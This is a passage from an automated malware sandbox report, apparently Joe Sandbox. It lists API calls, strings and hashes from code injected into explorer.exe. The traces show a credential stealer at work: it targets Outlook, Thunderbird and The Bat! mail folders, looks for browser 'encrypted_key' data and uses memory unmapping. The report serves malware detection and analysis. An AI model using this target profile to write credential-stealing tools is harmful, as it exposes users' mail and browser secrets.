                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB4D
                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 000CFB60
                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 000CFB95
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID: -journal$-wal$immutable$nolock
                                                        • API String ID: 3510742995-3408036318
                                                        Similarity
                                                        • API ID:
                                                        • String ID: %$-x0$NaN
                                                        • API String ID: 0-62881354
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        Similarity
                                                        • API ID:
                                                        • String ID: -x0$NaN
                                                        • API String ID: 0-3447725786
                                                        APIs
                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 000C720E
                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 000C7226
                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 000C727B
                                                        Similarity
                                                        • API ID: _aulldvrm$_aullrem
                                                        • String ID: -x0$NaN
                                                        • API String ID: 105165338-3447725786
                                                        APIs
                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 000C8AAD
                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 000C8B66
                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 000C8C9B
                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 000C8CAE
                                                        Similarity
                                                        • API ID: _allmul$_alldvrm
                                                        • String ID: .
                                                        • API String ID: 115548886-248832578
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID: ,$7$9
                                                        • API String ID: 2221118986-1653249994
                                                        APIs
                                                        • lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                        • StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                        • lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: .exe
                                                        • API String ID: 1659193697-4119554291
                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 000D316F
                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 000D31D2
                                                        • _alldiv.NTDLL(?,?,00000000), ref: 000D32DE
                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 000D32E7
                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 000D3392
                                                          • Part of subcall function 000D16CD: memset.NTDLL ref: 000D172B
                                                        Similarity
                                                        • API ID: _allmul$_alldivmemset
                                                        • String ID:
                                                        • API String ID: 3880648599-0
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                        • API String ID: 0-384346570
                                                        APIs
                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000C96E7
                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9707
                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 000C9739
                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 000C976C
                                                        • _allmul.NTDLL(?,?,?,?), ref: 000C9798
                                                        Similarity
                                                        • API ID: _alldiv$_allmul
                                                        • String ID:
                                                        • API String ID: 4215241517-0
                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 000DB1B3
                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 000DB20F
                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 000DB28A
                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 000DB298
                                                        Similarity
                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                        • String ID:
                                                        • API String ID: 1484705121-0
                                                        Similarity
                                                        • API ID: _alldiv_allmul
                                                        • String ID: winTruncate1$winTruncate2
                                                        • API String ID: 727729158-470713972
                                                        APIs
                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 000C18A7
                                                        • GlobalFix.KERNEL32(000C4B57), ref: 000C18B6
                                                        • GlobalUnWire.KERNEL32(?), ref: 000C18F4
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C18E8
                                                        Similarity
                                                        • API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
                                                        • String ID:
                                                        • API String ID: 2207111602-0
                                                        • Opcode ID: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                        • Instruction ID: 09e2922cd47ef2ddb887db81ecddd7a3827ca7cc636d0a6fc96dbb30dc5c6181
                                                        • Opcode Fuzzy Hash: 48d9cfc7d52d62ceac37f540dd647e4377d6472fa06f58b4765735def5569386
                                                        • Instruction Fuzzy Hash: 9801AD35204306AF8B059F659D18EDF7BEAEF8A350B10C42EF80583222DF32CD448A20
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1475610065-0
                                                        • Opcode ID: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                        • Instruction ID: 4d30f8789ad44f5c05cacdb9ce11480449c1b5baaced4d312f7891b0442361bf
                                                        • Opcode Fuzzy Hash: 45fb1d534a7621876c678f7d97b25d25c8b83790c70a3726d9c9173cabc42959
                                                        • Instruction Fuzzy Hash: 16E0656270021C1B475477AE5C94EFB76DCCBC96A53050039FA08D3203E966DC0546B0
                                                        APIs
                                                        • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                        • lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                        • StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                          • Part of subcall function 000C190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                          • Part of subcall function 000C190B: lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$lstrcat
                                                        • String ID: "encrypted_key":"
                                                        • API String ID: 493641738-877455259
                                                        • Opcode ID: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                        • Instruction ID: 9c6b67dcc6ef624df4736c2e561888b14e3c99406eaee6f665111c1420be8bfd
                                                        • Opcode Fuzzy Hash: c1c111d1c361ea2280c0eef5f7a872ca0a52f29db80e31099fd2fef06207ef3e
                                                        • Instruction Fuzzy Hash: 96E0222260AA682F83A9ABF52D44DCF3EA89F46210305407CF60193513DF938842C2A4
                                                        APIs
                                                          • Part of subcall function 000C6A81: memset.NTDLL ref: 000C6A9C
                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 000EF2A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _aulldivmemset
                                                        • String ID: %llu$%llu
                                                        • API String ID: 714058258-4283164361
                                                        • Opcode ID: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                        • Instruction ID: 733d781762fd89a8af3b4d8a65a072e1762b99422687671c30c8df4c3b8d9cf5
                                                        • Opcode Fuzzy Hash: d7441ef4cf18d0029357730f9c5777b07e4775ebdbfb8b08309078aadb0e519f
                                                        • Instruction Fuzzy Hash: 7721D4726446566BC714AB64CC42FBFB759AF85730F04823DFA25A72C2DB219C118BE1
                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,?), ref: 000D2174
                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 000D220E
                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 000D2241
                                                        • _allmul.NTDLL(000C2E26,00000000,?,?), ref: 000D2295
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: _allmul
                                                        • String ID:
                                                        • API String ID: 4029198491-0
                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                        • Instruction ID: 7aecc024886d43b95e8348e28dd4becad428794acad02cf143f155fdb2df515e
                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                        • Instruction Fuzzy Hash: 64A18D70708701AFD724EF64C881A6EB7E6AFE8704F00482EF65587352EB71ED458B62
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcpymemset
                                                        • String ID:
                                                        • API String ID: 1297977491-0
                                                        • Opcode ID: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                        • Instruction ID: ce6f6b553f9ce9aef2f833e00a544f58f3f1023c0b2831fe884ef76c5f2cd507
                                                        • Opcode Fuzzy Hash: c619ea2c298dd9c75116f67c9c0684c188a810f16eda2788c5e90550f24386e1
                                                        • Instruction Fuzzy Hash: 5F818D716083149FC354DF28C885A6BBBE5EFD8704F54492EF88A87352E770E905CBA2
                                                        APIs
                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,000C2783), ref: 000C192B
                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,000C2783), ref: 000C1930
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C1946
                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 000C194A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: lstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 1475610065-0
                                                        • Opcode ID: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                        • Instruction ID: 7c96ee7986758746c435996a51eed7706ca130184434f2eb8f608aff7d92e415
                                                        • Opcode Fuzzy Hash: a7dba3619789455ac5860b3542b82eba2cbc24a0238118d7caf8d9199f850cfb
                                                        • Instruction Fuzzy Hash: C7E09BA230061C2B472477AE5C94EFF76DCDBD95A53150039F904D3203EE669C0146B0

                                                        Execution Graph

                                                        Execution Coverage: 9.3%
                                                        Dynamic/Decrypted Code Coverage: 55.1%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 49
                                                        Total number of Limit Nodes: 2

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 107 638b0-63907 call 61ad4 call 61838 NtUnmapViewOfSection call 6388c 116 63911-6391a 107->116 117 63909-6390c call 638b0 107->117 117->116
                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000638F2
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                        • Instruction ID: 07d7c0bebfd5eab35338b42f632c169550439883b7608d4425e9f1fe2b024cbe
                                                        • Opcode Fuzzy Hash: 175f204f98ddab081ce75ab585c860cf335b3b36596ebe57e2ab61619d8d81c0
                                                        • Instruction Fuzzy Hash: F3F0A020F11A080FEAAC77FD685D3A822C2EB59310F900629B516C36D3DC398A458352

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseEnumOpen
                                                        • String ID:
                                                        • API String ID: 1332880857-0
                                                        • Opcode ID: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                        • Instruction ID: d4483960c43caaeea037d42a9e10a4b875f7596f5693c41f599e3ec46e3d9013
                                                        • Opcode Fuzzy Hash: e6d0cc022632efdd4a3c5a8daf3e56bcebce22f91e00e29876c625ce24938a9c
                                                        • Instruction Fuzzy Hash: 82416C30718F0C4FDB98EF6D94997AAB6E2FBD8341F04456EA14EC3262DE34D9448782

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        APIs
                                                        • LoadLibraryA.KERNEL32 ref: 0006A397
                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006A441
                                                        • VirtualProtect.KERNELBASE ref: 0006A45F
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000069000.00000040.80000000.00040000.00000000.sdmp, Offset: 00069000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_69000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 895956442-0
                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                        • Instruction ID: 006bc09559ba58e1e56ca86166064d69eaa2f5b492dea585316237ca25ff1824
                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                        • Instruction Fuzzy Hash: 99517D3175892E4BCB24BB7C9CC42F5B3C3F757321B18062AD08AD3385D559D9468B93

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 6372c-637ba call 61838 RegCreateKeyExW 101 637d6-637f0 call 61860 97->101 102 637bc-637cb 97->102 102->101 106 637cd-637d3 102->106 106->101
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID: ?
                                                        • API String ID: 2289755597-1684325040
                                                        • Opcode ID: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                        • Instruction ID: 0175cadc1eaba084e880b185854f7669454e214051596b44bd1488a6f786bdce
                                                        • Opcode Fuzzy Hash: 90b71b727ca288489aec266a13dd0a18d59c7ad321cf10e681fca41da4c5c652
                                                        • Instruction Fuzzy Hash: 9E11B970608B4C8FD750DF69D48865AB7E2FB98305F40062EE489C3321DF34D985CB82

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 119 622b4-622c6 120 622d6-622e6 119->120 121 622c8-622d0 CreateStreamOnHGlobal 119->121 121->120
                                                        APIs
                                                        • CreateStreamOnHGlobal.OLE32 ref: 000622D0
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.507483010.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_61000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID:
                                                        • API String ID: 2244384528-0
                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                        • Instruction ID: 6c511f69b69d8d3de49810070f3f7e1f5989998c8ca95c8496505d4ba7d4b445
                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                        • Instruction Fuzzy Hash: 7AE08C30108B0A8FD798AFBCE4CA07933A1EB9C252B05093EE005CB114D27988C18741

                                                        Execution Graph

                                                        Execution Coverage: 15.3%
                                                        Dynamic/Decrypted Code Coverage: 96.6%
                                                        Signature Coverage: 0%
                                                        Total number of Nodes: 233
                                                        Total number of Limit Nodes: 7

                                                        Callgraph


                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • lstrcatW.KERNEL32(00000000), ref: 00082588
                                                        • PathAppendW.SHLWAPI(00000000,*.*), ref: 00082594
                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,000818F4), ref: 000825A8
                                                        • RtlZeroMemory.NTDLL(00000209,00000209), ref: 000825C3
                                                        • lstrcatW.KERNEL32(00000209,?), ref: 000825E1
                                                        • PathAppendW.SHLWAPI(00000209,?), ref: 000825ED
                                                        • lstrcatW.KERNEL32(00000209,?), ref: 00082611
                                                        • PathAppendW.SHLWAPI(00000209,?), ref: 0008261D
                                                        • StrStrIW.SHLWAPI(00000209,?), ref: 0008262C
                                                        • FindNextFileW.KERNELBASE(00000000,?,?,000818F4), ref: 00082644
                                                        • FindClose.KERNEL32(00000000,?,000818F4), ref: 00082653
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
                                                        • String ID: *.*
                                                        • API String ID: 1648349226-438819550
                                                        • Opcode ID: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                        • Instruction ID: 9ab04f0758e8323f23007aef3f0b497425df495bdb796eec7b4485748527ddf8
                                                        • Opcode Fuzzy Hash: f244eec9a02c202261c54c00ec9b413ed975cdb29ccbfba86f23e8cd56307f5a
                                                        • Instruction Fuzzy Hash: C9217171204315AFE710BF209D589AFBBECFFC5B05F04051DFAD1A2251EB389A168B66

                                                        Control-flow Graph

                                                        control_flow_graph 267 81016-81020 call 827e2 270 81022-81023 267->270 271 81024-81049 call 829b7 RtlMoveMemory NtUnmapViewOfSection call 8104f 267->271 275 8104e 271->275
                                                        APIs
                                                          • Part of subcall function 000827E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,00082664,?,000818F4), ref: 000827EF
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0008103A
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00081043
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                        • String ID:
                                                        • API String ID: 1675517319-0
                                                        • Opcode ID: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                        • Instruction ID: 55d5dd33b2f901c1089b15beaab3eab97d09ece425fd31eaa01e34cb85dd0178
                                                        • Opcode Fuzzy Hash: baec96bfdead2c76f9d40b549b314d090c8656c966da0cfbe969c1d0fccf5cf0
                                                        • Instruction Fuzzy Hash: 23D05E31800260B7EA657774BC1E9CA2A8CBF45730B254251B6E5961D3C9794A818B71

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008107F
                                                        • ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081093
                                                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810A7
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000), ref: 000810BB
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810D3
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810E7
                                                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 000810FB
                                                        • ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 0008110F
                                                        • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0008104E,?,00081010), ref: 00081123
                                                        • wsprintfA.USER32 ref: 0008116B
                                                        • ExitProcess.KERNEL32 ref: 00081189
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
                                                        • String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
                                                        • API String ID: 1709485025-1688604020
                                                        • Opcode ID: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                        • Instruction ID: 4a2ba61a2a61d2de802517fd4c21c0c34be2e32a5e302aa0719222a3359143be
                                                        • Opcode Fuzzy Hash: 72968f9d89e6bc32a17a9400d13fd263b6a4988c16ccb6dcd1446170f9e16262
                                                        • Instruction Fuzzy Hash: 7331937174022566EA5133654C1AFFF198DBF81FD4B050124F6C9DA2C3DE598E0387B6

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00081289
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 000812A1
                                                        • CloseHandle.KERNELBASE(00000000), ref: 000816F4
                                                          • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                                          • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000400,?,00000000), ref: 000812E8
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0008132D
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081379
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000813B6
                                                          • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                                          • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                                        • Sleep.KERNELBASE(00000064), ref: 000816FD
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$MemoryMove$HeapRead$AllocateCloseCreateHandlePointerProcessSizeSleep
                                                        • String ID:
                                                        • API String ID: 1032042679-0
                                                        • Opcode ID: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                        • Instruction ID: 75e5417636b9bb59cc4e60b4fe32e97da451ac298a5a535e8d66e3deab824b36
                                                        • Opcode Fuzzy Hash: 61bc2f22d2100cfa5cada242e575fdd2c09bc464b337c3e81574e5df978ef6ef
                                                        • Instruction Fuzzy Hash: 9DD1D2746082119BC764BF2888406FABBEABFC8760F48462DF8D597295E7308D53CB95

                                                        Control-flow Graph

                                                        control_flow_graph 178 8274a-82763 CreateToolhelp32Snapshot 179 827b9-827bd 178->179 180 82765-8277d Process32First 178->180 181 827ae-827b0 180->181 182 8277f-82793 lstrcmpi 181->182 183 827b2-827b3 CloseHandle 181->183 184 827a0-827a8 Process32Next 182->184 185 82795-8279b call 827be 182->185 183->179 184->181 185->184
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00082758
                                                        • Process32First.KERNEL32(00000000,?), ref: 00082777
                                                        • lstrcmpi.KERNEL32(?,outlook.exe), ref: 0008278B
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 000827A8
                                                        • CloseHandle.KERNELBASE(00000000), ref: 000827B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                        • String ID: outlook.exe
                                                        • API String ID: 868014591-749849299
                                                        • Opcode ID: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                        • Instruction ID: 343884579346d2584715dea729d65f949d7c5dc94cdf17a98ebe8d79567dd670
                                                        • Opcode Fuzzy Hash: 5a2c25bce87a4886a15f15d2e2ef7a80a439fc0a196e4a8c78eb7e8f423e4933
                                                        • Instruction Fuzzy Hash: 23F06230505128ABE720BB65DC49BEE77BCBB48B25F400190E9C9A2191EB388B544F95

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.510177212.0000000000088000.00000040.80000000.00040000.00000000.sdmp, Offset: 00088000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_88000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                        • Instruction ID: a463335449e91c4295caeb03356daa0005c9d69c2ec95bec009e1af8dcd402f7
                                                        • Opcode Fuzzy Hash: 0108dd120b053b6f55e8645ecb237e8214c936467551cc72fb4cdbd494caad90
                                                        • Instruction Fuzzy Hash: 439137725193914FD726BE78CCC46B5BFE0FB52320B2C06A9D9D1CB386E7A4580AC764

                                                        Control-flow Graph

                                                        control_flow_graph 276 829b7-829c7 GetProcessHeap RtlAllocateHeap
                                                        APIs
